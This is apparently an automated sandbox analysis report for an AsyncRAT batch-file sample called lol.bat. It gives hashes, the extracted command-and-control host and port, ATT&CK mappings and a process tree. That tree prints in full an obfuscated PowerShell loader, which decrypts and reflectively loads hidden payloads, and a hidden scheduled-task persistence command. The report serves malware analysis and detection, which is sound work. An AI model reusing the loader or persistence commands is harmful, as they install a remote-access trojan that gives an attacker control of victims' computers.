asyncrat | 7772e47f23947ab8ec3ccd03173e02e73252b906cc780681447049e12d4cb9cb

Resubmissions

09-11-2024 16:16

241109-tq8bssxgql 10

09-11-2024 16:15

241109-tqdgesxfpa 10

Analysis

max time kernel
22s
max time network
16s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
09-11-2024 16:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

lol.bat
Size

279KB
MD5

b5c81dca8f6b148790d14c93ba1788d4
SHA1

11fa7bdf65ac8b835b27c895f3d3e357f87a28f2
SHA256

7772e47f23947ab8ec3ccd03173e02e73252b906cc780681447049e12d4cb9cb
SHA512

14bb171192854a481b7d26ec69e3dc7ffbe55755c3191629697298553ce919d5b1bd4719531b271304a530e5a01478bad0167f6fb66ae8d869da1f34b8713b51
SSDEEP

6144:5toA7r23ZOt+yxLqRvs+wAbTXJuE/SzXm3+gK+4QpTz:4AsOkmqTPbTJuEcmut+ppTz

Score

10^/10

asyncrat default execution rat

Malware Config

Extracted

Family

asyncrat

Botnet

Default

127.0.0.1:32758

pressure-continuous.gl.at.ply.gg:32758

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/4456-49-0x0000022EFE1D0000-0x0000022EFE1E6000-memory.dmp	family_asyncrat

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow	pid	Process
16	4456	powershell.exe
18	4456	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid	Process
3384	powershell.exe
1912	powershell.exe
4456	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

Processes:

powershell.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid	Process
3384	powershell.exe
3384	powershell.exe
1912	powershell.exe
1912	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	3384	powershell.exe
Token: SeDebugPrivilege	1912	powershell.exe
Token: SeIncreaseQuotaPrivilege	1912	powershell.exe
Token: SeSecurityPrivilege	1912	powershell.exe
Token: SeTakeOwnershipPrivilege	1912	powershell.exe
Token: SeLoadDriverPrivilege	1912	powershell.exe
Token: SeSystemProfilePrivilege	1912	powershell.exe
Token: SeSystemtimePrivilege	1912	powershell.exe
Token: SeProfSingleProcessPrivilege	1912	powershell.exe
Token: SeIncBasePriorityPrivilege	1912	powershell.exe
Token: SeCreatePagefilePrivilege	1912	powershell.exe
Token: SeBackupPrivilege	1912	powershell.exe
Token: SeRestorePrivilege	1912	powershell.exe
Token: SeShutdownPrivilege	1912	powershell.exe
Token: SeDebugPrivilege	1912	powershell.exe
Token: SeSystemEnvironmentPrivilege	1912	powershell.exe
Token: SeRemoteShutdownPrivilege	1912	powershell.exe
Token: SeUndockPrivilege	1912	powershell.exe
Token: SeManageVolumePrivilege	1912	powershell.exe
Token: 33	1912	powershell.exe
Token: 34	1912	powershell.exe
Token: 35	1912	powershell.exe
Token: 36	1912	powershell.exe
Token: SeIncreaseQuotaPrivilege	1912	powershell.exe
Token: SeSecurityPrivilege	1912	powershell.exe
Token: SeTakeOwnershipPrivilege	1912	powershell.exe
Token: SeLoadDriverPrivilege	1912	powershell.exe
Token: SeSystemProfilePrivilege	1912	powershell.exe
Token: SeSystemtimePrivilege	1912	powershell.exe
Token: SeProfSingleProcessPrivilege	1912	powershell.exe
Token: SeIncBasePriorityPrivilege	1912	powershell.exe
Token: SeCreatePagefilePrivilege	1912	powershell.exe
Token: SeBackupPrivilege	1912	powershell.exe
Token: SeRestorePrivilege	1912	powershell.exe
Token: SeShutdownPrivilege	1912	powershell.exe
Token: SeDebugPrivilege	1912	powershell.exe
Token: SeSystemEnvironmentPrivilege	1912	powershell.exe
Token: SeRemoteShutdownPrivilege	1912	powershell.exe
Token: SeUndockPrivilege	1912	powershell.exe
Token: SeManageVolumePrivilege	1912	powershell.exe
Token: 33	1912	powershell.exe
Token: 34	1912	powershell.exe
Token: 35	1912	powershell.exe
Token: 36	1912	powershell.exe
Token: SeIncreaseQuotaPrivilege	1912	powershell.exe
Token: SeSecurityPrivilege	1912	powershell.exe
Token: SeTakeOwnershipPrivilege	1912	powershell.exe
Token: SeLoadDriverPrivilege	1912	powershell.exe
Token: SeSystemProfilePrivilege	1912	powershell.exe
Token: SeSystemtimePrivilege	1912	powershell.exe
Token: SeProfSingleProcessPrivilege	1912	powershell.exe
Token: SeIncBasePriorityPrivilege	1912	powershell.exe
Token: SeCreatePagefilePrivilege	1912	powershell.exe
Token: SeBackupPrivilege	1912	powershell.exe
Token: SeRestorePrivilege	1912	powershell.exe
Token: SeShutdownPrivilege	1912	powershell.exe
Token: SeDebugPrivilege	1912	powershell.exe
Token: SeSystemEnvironmentPrivilege	1912	powershell.exe
Token: SeRemoteShutdownPrivilege	1912	powershell.exe
Token: SeUndockPrivilege	1912	powershell.exe
Token: SeManageVolumePrivilege	1912	powershell.exe
Token: 33	1912	powershell.exe
Token: 34	1912	powershell.exe
Token: 35	1912	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exe

description	pid	Process	procid_target
PID 3692 wrote to memory of 3384	3692	cmd.exe	87
PID 3692 wrote to memory of 3384	3692	cmd.exe	87
PID 3384 wrote to memory of 1912	3384	powershell.exe	88
PID 3384 wrote to memory of 1912	3384	powershell.exe	88
PID 3384 wrote to memory of 2848	3384	powershell.exe	94
PID 3384 wrote to memory of 2848	3384	powershell.exe	94
PID 2848 wrote to memory of 2088	2848	WScript.exe	95
PID 2848 wrote to memory of 2088	2848	WScript.exe	95
PID 2088 wrote to memory of 4456	2088	cmd.exe	97
PID 2088 wrote to memory of 4456	2088	cmd.exe	97

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\lol.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3692
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6FKXqM4AWzehcRMiEtEBJSZ307MDhrlms/qR1ZbmvDU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xXq5NOPfLug2n5zZd7UfxA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gIuVu=New-Object System.IO.MemoryStream(,$param_var); $DStlk=New-Object System.IO.MemoryStream; $aEunE=New-Object System.IO.Compression.GZipStream($gIuVu, [IO.Compression.CompressionMode]::Decompress); $aEunE.CopyTo($DStlk); $aEunE.Dispose(); $gIuVu.Dispose(); $DStlk.Dispose(); $DStlk.ToArray();}function execute_function($param_var,$param2_var){ $RzZmF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $dlKfW=$RzZmF.EntryPoint; $dlKfW.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\lol.bat';$fQtTT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\lol.bat').Split([Environment]::NewLine);foreach ($zlOoi in $fQtTT) { if ($zlOoi.StartsWith(':: ')) { $QSoii=$zlOoi.Substring(3); break; }}$payloads_var=[string[]]$QSoii.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3384
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_481_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_481.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1912
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_481.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:2848
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_481.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2088
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6FKXqM4AWzehcRMiEtEBJSZ307MDhrlms/qR1ZbmvDU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xXq5NOPfLug2n5zZd7UfxA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gIuVu=New-Object System.IO.MemoryStream(,$param_var); $DStlk=New-Object System.IO.MemoryStream; $aEunE=New-Object System.IO.Compression.GZipStream($gIuVu, [IO.Compression.CompressionMode]::Decompress); $aEunE.CopyTo($DStlk); $aEunE.Dispose(); $gIuVu.Dispose(); $DStlk.Dispose(); $DStlk.ToArray();}function execute_function($param_var,$param2_var){ $RzZmF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $dlKfW=$RzZmF.EntryPoint; $dlKfW.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_481.bat';$fQtTT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_481.bat').Split([Environment]::NewLine);foreach ($zlOoi in $fQtTT) { if ($zlOoi.StartsWith(':: ')) { $QSoii=$zlOoi.Substring(3); break; }}$payloads_var=[string[]]$QSoii.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4456

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f8d49a4af7a844bfc7247d5670def557

SHA1
26ae0ce194a77a7a1887cf93741293fdfa6c94c4

SHA256
61c60aa2e781a7f6ab54577db26d1be6ca3bf40c4c1d29eca48698e8cb5e1a2b

SHA512
9e034173b20c85fc63ec88d045ace936af567e52caafe5e5735cf6fd5e72d040b992b38c0490ee9d9e43f6f934695d5913bc7a0c682b36c99e5e2d9923c24a9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wpxa0luy.cqw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_481.bat

Filesize
279KB

MD5
b5c81dca8f6b148790d14c93ba1788d4

SHA1
11fa7bdf65ac8b835b27c895f3d3e357f87a28f2

SHA256
7772e47f23947ab8ec3ccd03173e02e73252b906cc780681447049e12d4cb9cb

SHA512
14bb171192854a481b7d26ec69e3dc7ffbe55755c3191629697298553ce919d5b1bd4719531b271304a530e5a01478bad0167f6fb66ae8d869da1f34b8713b51

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_481.vbs

Filesize
115B

MD5
b5851f17972f9b44c8d4a8ea1bbd1852

SHA1
fbf72615772bf39d6708b3edf0add5b304de53bc

SHA256
2568b4934a32670ea6304fce914e30b4daceaa79fe5a3ff7cbc738f459aa4f9c

SHA512
e9efa54e90099132555c7707b056c296a107426a8cf03fa4525ed5e9ab9169ea9081f0829447a0833b50a25dd87d06b170b46469b573b081c22a502ffa094d8a

Download Submit
memory/1912-26-0x00007FFD6ED50000-0x00007FFD6F811000-memory.dmp

Filesize
10.8MB

Download
memory/1912-17-0x00007FFD6ED50000-0x00007FFD6F811000-memory.dmp

Filesize
10.8MB

Download
memory/1912-27-0x00007FFD6ED50000-0x00007FFD6F811000-memory.dmp

Filesize
10.8MB

Download
memory/1912-30-0x00007FFD6ED50000-0x00007FFD6F811000-memory.dmp

Filesize
10.8MB

Download
memory/3384-14-0x000002525A5D0000-0x000002525A606000-memory.dmp

Filesize
216KB

Download
memory/3384-0-0x00007FFD6ED53000-0x00007FFD6ED55000-memory.dmp

Filesize
8KB

Download
memory/3384-13-0x000002525A360000-0x000002525A368000-memory.dmp

Filesize
32KB

Download
memory/3384-12-0x00007FFD6ED50000-0x00007FFD6F811000-memory.dmp

Filesize
10.8MB

Download
memory/3384-11-0x00007FFD6ED50000-0x00007FFD6F811000-memory.dmp

Filesize
10.8MB

Download
memory/3384-10-0x000002525A370000-0x000002525A392000-memory.dmp

Filesize
136KB

Download
memory/3384-50-0x00007FFD6ED50000-0x00007FFD6F811000-memory.dmp

Filesize
10.8MB

Download
memory/4456-49-0x0000022EFE1D0000-0x0000022EFE1E6000-memory.dmp

Filesize
88KB

Download